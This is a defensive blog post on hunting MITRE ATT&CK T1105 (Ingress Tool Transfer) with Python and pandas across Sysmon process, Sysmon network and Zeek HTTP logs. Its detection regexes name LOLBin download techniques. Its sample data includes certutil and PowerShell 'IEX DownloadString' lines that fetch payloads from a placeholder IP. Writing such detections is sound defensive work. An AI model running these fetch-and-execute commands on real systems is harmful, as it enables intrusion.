Charles Givre

Originally published at gtkcyber.com

Detecting Ingress Tool Transfer (T1105) with Python

After initial access, attackers almost always need to pull more tooling onto the host: a beacon, a credential dumper, a tunneler. That step is Ingress Tool Transfer (T1105) in MITRE ATT&CK, and it is hard to catch with signatures because the transfer mechanisms are legitimate. certutil, bitsadmin, curl, and PowerShell all download files for normal reasons. The signal is in the combination and the rarity, not the binary itself.

This is where a little data science beats another detection rule. Here is how to hunt T1105 in Python across three layers: the process command line, the process-to-network relationship, and the payload on the wire.

Where T1105 Shows Up in Your Logs

Three sources cover most of it:

  • Sysmon Event ID 1 (process creation) for the download command line and parent process
  • Sysmon Event ID 3 (network connection) to confirm the process actually reached out
  • Zeek http.log (or proxy logs) for the file coming across the wire

You can load all three into pandas DataFrames and work on them directly. No SIEM required, which matters when you are working an exported archive from a host you do not control.

Catching LOLBin Downloaders in the Command Line

Start with the living-off-the-land binaries attackers reach for. Load Sysmon Event ID 1 and flag the download patterns:

import pandas as pd

proc = pd.read_csv("sysmon_eid1.csv")  # UtcTime, Image, CommandLine, ParentImage, ProcessGuid

# Download patterns by LOLBin (see the LOLBAS project)
# Groups are non-capturing (?:...) so str.contains does not warn about match groups
patterns = {
    "certutil":   r"certutil.*(?:-urlcache|-f|-split).*http",
    "bitsadmin":  r"bitsadmin.*(?:/transfer|/addfile)",
    "powershell": r"(?:downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer)",
    "mshta":      r"mshta.*http",
    "curl_wget":  r"\b(?:curl|wget)\b.*http",
}

cmd = proc["CommandLine"].fillna("").str.lower()
for name, rx in patterns.items():
    proc[name] = cmd.str.contains(rx, regex=True, na=False)

suspect = proc[proc[list(patterns)].any(axis=1)]

This catches the noisy cases. It will also fire on legitimate admin activity, so the command line alone is a lead, not a verdict. The next two layers are what cut the false positives.
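To see why a command-line hit is only a lead, here is a minimal sketch that runs the same patterns over a few sample command lines. The command lines, IP addresses, and hostnames are hypothetical and made up for illustration; they are not taken from real logs.

```python
import pandas as pd

# Hypothetical command lines for illustration only (not from real logs).
samples = pd.DataFrame({
    "CommandLine": [
        r"certutil.exe -urlcache -split -f http://203.0.113.10/a.txt C:\Users\Public\a.exe",
        r"powershell -nop -c IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/s.ps1')",
        r"curl.exe -o C:\Temp\agent.msi https://updates.example.com/agent.msi",  # plausible admin activity
        r"notepad.exe C:\Users\alice\notes.txt",
    ]
})

# Same download patterns as above, written with non-capturing groups.
patterns = {
    "certutil":   r"certutil.*(?:-urlcache|-f|-split).*http",
    "bitsadmin":  r"bitsadmin.*(?:/transfer|/addfile)",
    "powershell": r"(?:downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer)",
    "mshta":      r"mshta.*http",
    "curl_wget":  r"\b(?:curl|wget)\b.*http",
}

cmd = samples["CommandLine"].fillna("").str.lower()
hits = pd.DataFrame({name: cmd.str.contains(rx, regex=True) for name, rx in patterns.items()})

# Comma-separated list of the pattern names that fired on each row.
samples["matched"] = [
    ",".join(name for name in patterns if hits.at[i, name]) for i in hits.index
]
print(samples[["CommandLine", "matched"]])
```

The third row is the interesting one: a software update pulled with curl matches just as cleanly as the certutil download, and nothing in the command line alone separates the two.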

Beyond Signatures: Rare Process-to-Network Pairs

The stronger signal for T1105 is a process that does not normally talk to the internet suddenly making an external connection. Build a baseline from Sysmon Event ID 3 and flag the rare pairs:

import ipaddress

net = pd.read_csv("sysmon_eid3.csv")  # Image, DestinationIp, DestinationPort, DestinationHostname

def is_external(ip):
    try:
        return not ipaddress.ip_address(ip).is_private
    except ValueError:
        return False

ext = net[net["DestinationIp"].map(is_external)].copy()
ext["proc"] = ext["Image"].str.lower()

# How often does each process talk externally across the whole environment?
freq = ext.groupby("proc")["DestinationIp"].count()
rare = freq[freq <= 3].index            # processes that almost never egress

flagged = ext[ext["proc"].isin(rare)]

certutil.exe or notepad.exe opening an external connection lands in rare because, fleet-wide, those processes almost never egress. The <= 3 threshold is a raw connection count, so tune it to both your environment size and the time window your logs cover. For a more principled version, score each (process, destination) pair by frequency and treat the long tail as the hunt queue. That is the same intuition behind anomaly detectors such as scikit-learn's IsolationForest, without the model overhead.
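One way to sketch the pair-level scoring, under some assumptions: the frame below is a small hypothetical stand-in for ext, and the Computer column (the host that reported the event) is assumed to be present in your export. The column names connections, hosts, and share are illustrative.

```python
import pandas as pd

# Hypothetical external connections standing in for the `ext` frame.
# "Computer" is an assumed column naming the host that logged the event.
ext = pd.DataFrame({
    "Computer":      ["ws1", "ws2", "ws3", "ws1", "ws2", "ws4"],
    "proc":          ["chrome.exe", "chrome.exe", "chrome.exe",
                      "chrome.exe", "certutil.exe", "chrome.exe"],
    "DestinationIp": ["198.51.100.7", "198.51.100.7", "198.51.100.7",
                      "198.51.100.8", "203.0.113.10", "198.51.100.8"],
})

# Count connections and distinct hosts for every (process, destination) pair.
pairs = (
    ext.groupby(["proc", "DestinationIp"])
       .agg(connections=("Computer", "size"), hosts=("Computer", "nunique"))
       .reset_index()
)

# Share of all external connections that this pair accounts for.
pairs["share"] = pairs["connections"] / pairs["connections"].sum()

# Rarest pairs first: seen on the fewest hosts, then the fewest connections.
hunt_queue = pairs.sort_values(["hosts", "connections"]).reset_index(drop=True)
print(hunt_queue)
```

Sorting by distinct hosts before raw connection count is a design choice rather than a rule. A pair seen once on each of fifty machines is probably software behaving normally, while a pair seen fifty times on one machine may still deserve a look.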

Catching the Payload on the Wire

Attackers rename payloads, so do not trust the file extension. Zeek records the actual response MIME type, which is what you want. Parse http.log and filter for executable content regardless of how the URL ends:

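import io

def load_zeek(path):
    """Load a Zeek TSV log, taking column names from its #fields header."""
    cols, rows = None, []
    with open(path) as f:
        for line in f:
            if line.startswith("#fields"):
                cols = line.rstrip("\n").split("\t")[1:]
            elif not line.startswith("#"):
                rows.append(line)
    # Header lines are dropped here instead of with comment="#", which would
    # also truncate any data row containing "#" (for example in a URI).
    return pd.read_csv(io.StringIO("".join(rows)), sep="\t", names=cols,
                       na_values=["-", "(empty)"])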

http = load_zeek("http.log")  # ts, host, uri, method, resp_mime_types, user_agent

exe_mimes = ["application/x-dosexec", "application/x-msdownload", "application/octet-stream"]
is_exe = http["resp_mime_types"].fillna("").str.contains("|".join(exe_mimes), regex=True)
downloads = http[is_exe].copy()  # copy so adding a column below does not warn

# A .jpg URL that returns a PE file is a strong T1105 lead
downloads["ext"] = (downloads["uri"].str.lower()
                    .str.extract(r"\.([a-z0-9]{1,5})(?:\?|$)", expand=False))
# Keep rows that have an extension, but not one of the expected executable ones
mismatched = downloads[downloads["ext"].notna()
                       & ~downloads["ext"].isin(["exe", "dll", "msi"])]

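A URI ending in .jpg that returns application/x-dosexec is the kind of mismatch that almost never has a benign explanation. Treat application/octet-stream matches with more caution, since servers use that generic type for many non-executable downloads. Pair the mismatches with the rare-egress process list above and you have a high-confidence T1105 lead without a single static signature.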

Putting It Together

The three layers reinforce each other. The command-line patterns give you candidate processes, the rare process-to-network baseline tells you which ones are abnormal, and the wire data confirms an executable actually moved. A finding that lights up all three is worth waking someone for. One layer alone is a lead to triage.
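A rough sketch of how the three layers might be combined into a single triage score. The frames below are tiny hypothetical stand-ins for suspect, flagged, and mismatched. The sketch assumes ProcessGuid was exported with the Event ID 3 data and that the Zeek log carries its usual id.resp_h responder address. The column names cmdline_hit, rare_egress, wire_hit, and layers are illustrative.

```python
import pandas as pd

# Hypothetical stand-ins for the outputs of the three layers.
suspect = pd.DataFrame({        # layer 1: command-line pattern hits
    "ProcessGuid": ["{A}", "{B}"],
    "Image": [r"c:\windows\system32\certutil.exe", r"c:\windows\system32\curl.exe"],
})
flagged = pd.DataFrame({        # layer 2: rare external egress (assumes ProcessGuid was exported)
    "ProcessGuid": ["{A}", "{C}"],
    "DestinationIp": ["203.0.113.10", "198.51.100.8"],
})
mismatched = pd.DataFrame({     # layer 3: executable content behind a non-executable extension
    "id.resp_h": ["203.0.113.10"],
    "uri": ["/img/logo.jpg"],
})

# Outer join keeps processes seen by only one of the two Sysmon layers.
combined = suspect.merge(flagged, on="ProcessGuid", how="outer", indicator=True)
side = combined["_merge"].astype(str)
combined["cmdline_hit"] = side.isin(["both", "left_only"])
combined["rare_egress"] = side.isin(["both", "right_only"])

# Wire layer: did this process connect to a server that delivered a mismatched payload?
combined["wire_hit"] = combined["DestinationIp"].isin(mismatched["id.resp_h"])

# Number of layers that fired for each process; 3 is the "wake someone" case.
combined["layers"] = combined[["cmdline_hit", "rare_egress", "wire_hit"]].sum(axis=1)
triage = combined.sort_values("layers", ascending=False).drop(columns="_merge")
print(triage[["ProcessGuid", "cmdline_hit", "rare_egress", "wire_hit", "layers"]])
```

Matching on destination IP alone is deliberately loose. On real data you would likely also constrain the join by source host and a time window around the connection, since shared hosting and CDNs put many unrelated downloads behind the same address.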

This is the workflow we teach in GTK Cyber's Threat Hunting with Data Science course: building detections from log data and statistics rather than waiting for a vendor signature. If you want the full reference on the technique itself, the T1105 page has the ATT&CK detail and related techniques, and the threat hunting pipeline post shows how to wire these queries into something repeatable.
